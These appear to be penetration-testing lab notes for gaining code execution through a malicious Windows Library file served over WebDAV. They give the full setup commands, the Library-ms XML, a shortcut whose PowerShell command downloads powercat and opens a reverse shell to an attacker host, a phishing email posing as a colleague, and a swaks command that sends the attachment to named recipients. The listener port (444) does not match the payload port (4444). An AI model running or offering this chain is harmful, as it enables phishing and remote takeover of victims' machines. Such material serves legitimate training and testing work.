Code execution via Windows Library Files

code execution via Windows Library Files

• Enable webdav share

  • mkdir /home/kali/webdav

  • cd ~/webdav

  • python -m venv .venv

  • source .venv/bin/activate

    • python -m pip install -U pip

    • python -m pip install wsgidav cheroot lxml

    • wsgidav --host=0.0.0.0 --port=80 --auth=anonymous -r /home/kali/webdav/

• Create 2 file on Windows

  • open window machine

  • Open vscode

    • create new file name config.Library-ms

      • <?xml version="1.0" encoding="UTF-8"?> <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <name>@windows.storage.dll,-34582</name> <version>6</version> <isLibraryPinned>true</isLibraryPinned> <iconReference>imageres.dll,-1003</iconReference> <templateInfo> <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType> </templateInfo> <searchConnectorDescriptionList> <searchConnectorDescription> <isDefaultSaveLocation>true</isDefaultSaveLocation> <isSupported>false</isSupported> <simpleLocation> <url>http://192.168.119.2</url> </simpleLocation> </searchConnectorDescription> </searchConnectorDescriptionList> </libraryDescription>

      • save on desktop

    • create a shortcut file name install

      • Right click on desktop New>shortcut

      • enter command in item’s location

        • powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.3:8000/powercat.ps1');powercat -c 192.168.119.3 -p 4444 -e powershell"

        

  • Transfer both file on webdav dir

• On Webdav dir

  • nano body.txt

    • Hey! I checked mail and discovered that the previously used staging script still exists in the Git logs. I'll remove it for security reasons. On an unrelated note, please install the new security features on your workstation. For this, download the attached file, double-click on it, and execute the configuration shortcut within. Thanks! John

  • cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .

  • and 2 file from windows

  • python3 -m http.server 8000

  • nc -nvlp 444

• Now send email

  sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap